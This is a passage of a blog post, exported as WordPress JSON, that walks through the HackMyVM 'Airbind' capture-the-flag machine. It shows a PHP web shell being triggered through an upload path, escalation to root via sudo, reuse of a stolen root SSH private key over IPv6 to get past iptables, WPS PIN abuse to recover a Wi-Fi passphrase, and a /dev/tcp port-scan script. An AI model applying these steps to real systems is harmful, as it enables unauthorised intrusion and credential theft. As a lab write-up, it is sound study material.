&#039;http:\/\/10.0.2.21\/images\/uploads\/logos\/1734147609-shell.php?cmd=whoami&#039;\nGIF89a;\n\nwww-data<\/code><\/pre>\n<p>Success, now try a reverse shell! (It suddenly occurred to me that the earlier failure was probably because I had put the wrong IP in that shell... so I tried again and it worked...)<\/p>\n<p><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229367.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229367.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214114414574\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ubuntu:\/$ whoami;id;hostname\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nubuntu\n(remote) www-data@ubuntu:\/$ sudo -l\nMatching Defaults entries for www-data on ubuntu:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on ubuntu:\n    (ALL) NOPASSWD: ALL\n(remote) www-data@ubuntu:\/$ sudo su\nroot@ubuntu:\/# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ubuntu:\/# pwd\n\/\nroot@ubuntu:\/# cd ~\nroot@ubuntu:~# pwd\n\/root\nroot@ubuntu:~# ls -la\ntotal 40\ndrwx------  4 root root 4096 May 21  2024 .\ndrwxr-xr-x 17 root root 4096 Dec 14 02:52 ..\nlrwxrwxrwx  1 root root    9 Apr  2  2024 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Oct 17  2022 .bashrc\n-rw-------  1 root root   20 May 21  2024 .lesshst\ndrwxr-xr-x  3 root root 4096 Apr  1  2024 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   66 May 21  2024 .selected_editor\n-rw-------  1 root root  300 May 21  2024 
.sqlite_history\ndrwx------  2 root root 4096 Apr  2  2024 .ssh\n-rwx------  1 root root   33 Apr  2  2024 user.txt\n-rw-------  1 root root    0 May 21  2024 .wpa_cli_history<\/code><\/pre>\n<p>But there is only the user flag and a private key here; save them first:<\/p>\n<pre><code class=\"language-bash\">root@ubuntu:~\/.ssh# cat id_rsa\nroot@ubuntu:~\/.ssh# cat id_rsa.pub<\/code><\/pre>\n<p>Then keep looking:<\/p>\n<pre><code class=\"language-bash\">root@ubuntu:~# ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever 
preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: eth0@if8: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UP group default qlen 1000\n    link\/ether dc:a1:f7:82:76:13 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n    inet 10.0.3.241\/24 brd 10.0.3.255 scope global eth0\n       valid_lft forever preferred_lft forever\n    inet6 fe80::dea1:f7ff:fe82:7613\/64 scope link \n       valid_lft forever preferred_lft forever\n3: wlan0: &lt;NO-CARRIER,BROADCAST,MULTICAST,UP&gt; mtu 1500 qdisc mq state DOWN group default qlen 1000\n    link\/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n6: ap0: &lt;BROADCAST,MULTICAST&gt; mtu 1500 qdisc noop state DOWN group default qlen 1000\n    link\/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff<\/code><\/pre>\n<h3>\u89e3\u6cd5\u4e00\uff1aIPV6\u7ed5\u8fc7iptables<\/h3>\n<p>\u8be6\u60c5\u53c2\u8003\uff1a<a href=\"https:\/\/www.bilibili.com\/video\/BV1j442197dv\/\">https:\/\/www.bilibili.com\/video\/BV1j442197dv\/<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ping6 -I eth0 ff02::1\nping6: Warning: source address might be selected on device other than: eth0\nPING ff02::1 (ff02::1) from :: eth0: 56 data bytes\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=1 ttl=64 time=0.025 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=1 ttl=64 time=2.10 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=2 ttl=64 time=0.031 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=2 ttl=64 time=0.806 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=3 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=3 ttl=64 time=0.742 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=4 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=4 ttl=64 time=1.08 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=5 ttl=64 time=0.034 ms\n64 
bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=5 ttl=64 time=1.33 ms\n^C\n--- ff02::1 ping statistics ---\n5 packets transmitted, 5 received, +5 duplicates, 0% packet loss, time 4031ms\nrtt min\/avg\/max\/mdev = 0.025\/0.621\/2.096\/0.683 ms\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ssh root@fe80::99b:2e02:395e:4e6f%eth0 -i id_rsa\nThe authenticity of host &#039;fe80::99b:2e02:395e:4e6f%eth0 (fe80::99b:2e02:395e:4e6f%eth0)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:8cphJbastRTfWZolTBt5XJJ1GFOq9EbCLKKGghygXSo.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:33: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;fe80::99b:2e02:395e:4e6f%eth0&#039; (ED25519) to the list of known hosts.\nroot@fe80::99b:2e02:395e:4e6f%eth0&#039;s password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ls -la\ntotal 180\ndrwxr-xr-x   2 kali kali  4096 Dec 13 22:55 .\ndrwxr-xr-x 136 kali kali  4096 Oct  9 02:52 ..\n-rw-r--r--   1 kali kali  1808 Dec 13 22:00 51924.txt\n-rw-r--r--   1 kali kali 81719 Dec 13 21:56 ferox-http_10_0_2_21-1734144980.state\n-rw-r--r--   1 kali kali  5996 Dec 13 22:01 ferox-http_10_0_2_21-1734145306.state\n-rw-r--r--   1 kali kali    61 Dec 13 22:13 hash\n-rw-------   1 kali kali  2590 Dec 13 22:55 id_rsa\n-rw-r--r--   1 kali kali   565 Dec 13 22:55 id_rsa.pub\n-rw-r--r--   1 kali kali  3919 Dec 13 22:30 shell.php\n-rw-r--r--   1 kali kali 65536 Dec 13 22:05 wallos.db\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ chmod 600 id_rsa\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ssh root@fe80::a00:27ff:fe1b:404c%eth0 -i id_rsa\nThe authenticity of host &#039;fe80::a00:27ff:fe1b:404c%eth0 
(fe80::a00:27ff:fe1b:404c%eth0)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.\nThis host key is known by the following other names\/addresses:\n    ~\/.ssh\/known_hosts:89: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;fe80::a00:27ff:fe1b:404c%eth0&#039; (ED25519) to the list of known hosts.\nLinux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@airbind:~# whoami;id;ls -la\nroot\nuid=0(root) gid=0(root) groupes=0(root)\ntotal 32\ndrwx------  5 root root 4096 21 mai    2024 .\ndrwxr-xr-x 18 root root 4096  1 avril  2024 ..\nlrwxrwxrwx  1 root root    9  9 mars   2024 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 10 avril  2021 .bashrc\ndrwx------  2 root root 4096  2 avril  2024 .config\ndrwxr-xr-x  3 root root 4096  1 avril  2024 .local\n-rw-r--r--  1 root root  161  9 juil.  
2019 .profile\n-rwx------  1 root root   33  2 avril  2024 root.txt\ndrwx------  2 root root 4096  2 avril  2024 .ssh<\/code><\/pre>\n<p>The principle is roughly this: the host has an IP filter in place, so you cannot log in by the usual route, but IPv6 happens to bypass that filter.<\/p>\n<blockquote>\n<p>From this you can see that the failure was probably caused by the Wi-Fi adapter inside the VM conflicting with my local network adapter.<\/p>\n<\/blockquote>\n<h3>Method 2: The author's solution<\/h3>\n<p>First, scan for information about this open wireless port.<\/p>\n<pre><code class=\"language-bash\">root@ubuntu:~# iwlist wlan0 scanning\nwlan0     Scan completed :\n          Cell 01 - Address: 02:00:00:00:01:00\n                    Channel:7\n                    Frequency:2.442 GHz (Channel 7)\n                    Quality=70\/70  Signal level=-30 dBm  \n                    Encryption key:on\n                    ESSID:&quot;TL-WR842ND&quot;\n                    Bit Rates:1 Mb\/s; 2 Mb\/s; 5.5 Mb\/s; 11 Mb\/s; 6 Mb\/s\n                              9 Mb\/s; 12 Mb\/s; 18 Mb\/s\n                    Bit Rates:24 Mb\/s; 36 Mb\/s; 48 Mb\/s; 54 Mb\/s\n                    Mode:Master\n                    Extra:tsf=0006293310197962\n                    Extra: Last beacon: 80ms ago\n                    IE: Unknown: 000A544C2D57523834324E44\n                    IE: Unknown: 010882848B960C121824\n                    IE: Unknown: 030107\n                    IE: Unknown: 2A0104\n                    IE: Unknown: 32043048606C\n                    IE: IEEE 802.11i\/WPA2 Version 1\n                        Group Cipher : CCMP\n                        Pairwise Ciphers (1) : CCMP\n                        Authentication 
Suites (1) : PSK\n                    IE: Unknown: 3B025100\n                    IE: Unknown: 7F080400400200000040\n                    IE: Unknown: DDA90050F204104A00011010440001021041000101101200020000105300022108103B00010310470010572CF82FC95756539B16B5CFB298ABF11021000754502D4C494E4B1023000A544C2D57523834324E4410240001201042001D51514848302D36465943582D45515A52502D4C585642302D37423848531054000800010050F20400011011000A544C2D57523834324E441008000221081049000E00372A0001200106FFFFFFFFFFFF<\/code><\/pre>\n<p>Found the version number, then found the manual and looked up the default PIN:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229368.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229368.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214120926862\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229369.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229369.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214121121612\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229370.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229370.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214121158040\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Then try using <code>wpa_supplicant<\/code> to control the wireless device, and set up its configuration file:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229371.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229371.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20241214121451498\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code 
class=\"language-bash\">#\/etc\/wpa_supplicant\/wpa_supplicant.conf\nctrl_interface=\/run\/wpa_supplicant\nupdate_config=1<\/code><\/pre>\n<p>Add it:<\/p>\n<pre><code class=\"language-bash\">#~\/wpa_supplicant.conf\nctrl_interface=\/var\/run\/wpa_supplicant\nupdate_config=1<\/code><\/pre>\n<p>Then try initializing it in the background:<\/p>\n<pre><code class=\"language-bash\">root@ubuntu:~# wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B\nSuccessfully initialized wpa_supplicant\nrfkill: Cannot open RFKILL control device\nrfkill: Cannot get wiphy information<\/code><\/pre>\n<p>Then try to connect:<\/p>\n<pre><code class=\"language-bash\">root@ubuntu:~# wpa_cli\nwpa_cli v2.10\nCopyright (c) 2004-2022, Jouni Malinen &lt;j@w1.fi&gt; and contributors\n\nThis software may be distributed under the terms of the BSD license.\nSee README for more details.\n\nSelected interface &#039;wlan0&#039;\n\nInteractive mode\n\n> wps_pin any 55117319\n55117319\n&lt;3&gt;CTRL-EVENT-NETWORK-ADDED 0\n&lt;3&gt;WPS-PIN-ACTIVE \n&lt;3&gt;CTRL-EVENT-SCAN-STARTED \n&lt;3&gt;CTRL-EVENT-SCAN-RESULTS \n&lt;3&gt;WPS-AP-AVAILABLE-AUTH \n&lt;3&gt;SME: Trying to authenticate with 02:00:00:00:01:00 (SSID=&#039;TL-WR842ND&#039; freq=2442 MHz)\n&lt;3&gt;Trying to associate with 02:00:00:00:01:00 (SSID=&#039;TL-WR842ND&#039; freq=2442 MHz)\n&lt;3&gt;Associated with 02:00:00:00:01:00\n&lt;3&gt;CTRL-EVENT-SUBNET-STATUS-UPDATE status=0\n&lt;3&gt;CTRL-EVENT-EAP-STARTED EAP authentication started\n&lt;3&gt;CTRL-EVENT-EAP-STATUS status=&#039;started&#039; parameter=&#039;&#039;\n&lt;3&gt;CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1\n&lt;3&gt;CTRL-EVENT-EAP-STATUS status=&#039;accept proposed method&#039; parameter=&#039;WSC&#039;\n&lt;3&gt;CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected\n&lt;3&gt;WPS-CRED-RECEIVED \n&lt;3&gt;WPS-SUCCESS \n&lt;3&gt;CTRL-EVENT-EAP-STATUS 
status=&#039;completion&#039; parameter=&#039;failure&#039;\n&lt;3&gt;CTRL-EVENT-EAP-FAILURE EAP authentication failed\n&lt;3&gt;CTRL-EVENT-DISCONNECTED bssid=02:00:00:00:01:00 reason=3 locally_generated=1\n&lt;3&gt;CTRL-EVENT-DSCP-POLICY clear_all\n&lt;3&gt;SME: Trying to authenticate with 02:00:00:00:01:00 (SSID=&#039;TL-WR842ND&#039; freq=2442 MHz)\n&lt;3&gt;Trying to associate with 02:00:00:00:01:00 (SSID=&#039;TL-WR842ND&#039; freq=2442 MHz)\n&lt;3&gt;Associated with 02:00:00:00:01:00\n&lt;3&gt;CTRL-EVENT-SUBNET-STATUS-UPDATE status=0\n&lt;3&gt;WPA: Key negotiation completed with 02:00:00:00:01:00 [PTK=CCMP GTK=CCMP]\n&lt;3&gt;CTRL-EVENT-CONNECTED - Connection to 02:00:00:00:01:00 completed [id=0 id_str=]<\/code><\/pre>\n<p>It connected.<\/p>\n<pre><code class=\"language-bash\">root@ubuntu:~# dhclient wlan0\nroot@ubuntu:~# cat wpa_supplicant.conf \nctrl_interface=\/var\/run\/wpa_supplicant\nupdate_config=1\n\nnetwork={\n        ssid=&quot;TL-WR842ND&quot;\n        psk=&quot;leEAYAejoIDJ7pU4jykJ7kCkEh3gx1&quot;\n        proto=RSN\n        key_mgmt=WPA-PSK\n        pairwise=CCMP-256 GCMP-256 CCMP GCMP\n        group=CCMP-256 GCMP-256 CCMP GCMP TKIP\n        auth_alg=OPEN\n        mesh_fwding=1\n        pbss=2\n}<\/code><\/pre>\n<pre><code class=\"language-bash\">root@ubuntu:~# route -n\nKernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n0.0.0.0         10.0.3.1        0.0.0.0         UG    0      0        0 eth0\n10.0.3.0        0.0.0.0         255.255.255.0   U     0      0        0 eth0\n192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 wlan0<\/code><\/pre>\n<p>Then write a script to try to exploit it:<\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\nfor ip in {1..255} ; do\n    timeout 1 bash -c &quot;echo &gt; \/dev\/tcp\/192.168.10.$ip\/22 2&gt;\/dev\/null&quot;\n    [[ $? 
-eq 0 ]] &amp;&amp; echo &quot;192.168.10.$ip UP&quot;\ndone<\/code><\/pre>\n<pre><code class=\"language-bash\">root@ubuntu:\/tmp# nano exp\nroot@ubuntu:\/tmp# cat exp\n#!\/bin\/bash\n\nfor ip in {1..255} ; do\n        timeout 1 bash -c &quot;echo &gt; \/dev\/tcp\/192.168.10.$ip\/22 2&gt;\/dev\/null&quot;\n    [[ $? -eq 0 ]] &amp;&amp; echo &quot;192.168.10.$ip UP&quot;\ndone\nroot@ubuntu:\/tmp# chmod +x *\nroot@ubuntu:\/tmp# bash exp\n192.168.10.1 UP\n^C^C^C^C^C^C^C^C^C^C\n^C^Z\n[1]+  Stopped                 bash exp\nroot@ubuntu:\/tmp# cd ~\nroot@ubuntu:~# ssh 192.168.10.\nssh: Could not resolve hostname 192.168.10.: Name or service not known\nroot@ubuntu:~# ssh 192.168.10.1\nLinux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nroot@airbind:~# whoami;id\nroot\nuid=0(root) gid=0(root) groupes=0(root)\nroot@airbind:~# ls -la\ntotal 32\ndrwx------  5 root root 4096 21 mai    2024 .\ndrwxr-xr-x 18 root root 4096  1 avril  2024 ..\nlrwxrwxrwx  1 root root    9  9 mars   2024 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 10 avril  2021 .bashrc\ndrwx------  2 root root 4096  2 avril  2024 .config\ndrwxr-xr-x  3 root root 4096  1 avril  2024 .local\n-rw-r--r--  1 root root  161  9 juil.  
2019 .profile\n-rwx------  1 root root   33  2 avril  2024 root.txt\ndrwx------  2 root root 4096  2 avril  2024 .ssh<\/code><\/pre>\n<p>Got a shell this way too. Awesome!<\/p>\n<h2>References<\/h2>\n<p><a href=\"https:\/\/youtu.be\/OffNnj5RQJQ?si=Gzh4kVJqmL0GT0FZ\">https:\/\/youtu.be\/OffNnj5RQJQ?si=Gzh4kVJqmL0GT0FZ<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Airbind\/Ctf.md\">https:\/\/github.com\/HosseinVampire\/Writeups\/blob\/main\/Hackmyvm\/Machines\/Airbind\/Ctf.md<\/a><\/p>\n<p><a href=\"https:\/\/vishal-chandak.medium.com\/hackmyvm-airbind-2d776bc55fe1\">https:\/\/vishal-chandak.medium.com\/hackmyvm-airbind-2d776bc55fe1<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/tanbinn\/article\/details\/139784974\">https:\/\/blog.csdn.net\/tanbinn\/article\/details\/139784974<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1j442197dv\/\">https:\/\/www.bilibili.com\/video\/BV1j442197dv\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Airbind At a glance it is my own router... Looks like the machine was set up wrong, so try re-importing it: Still cannot find it in the scan, so keep trying! Re-imported, processor 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-821","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=821"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/821\/revisions"}],"predecessor-version":[{"id":822,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/821\/revisions\/822"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=821"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}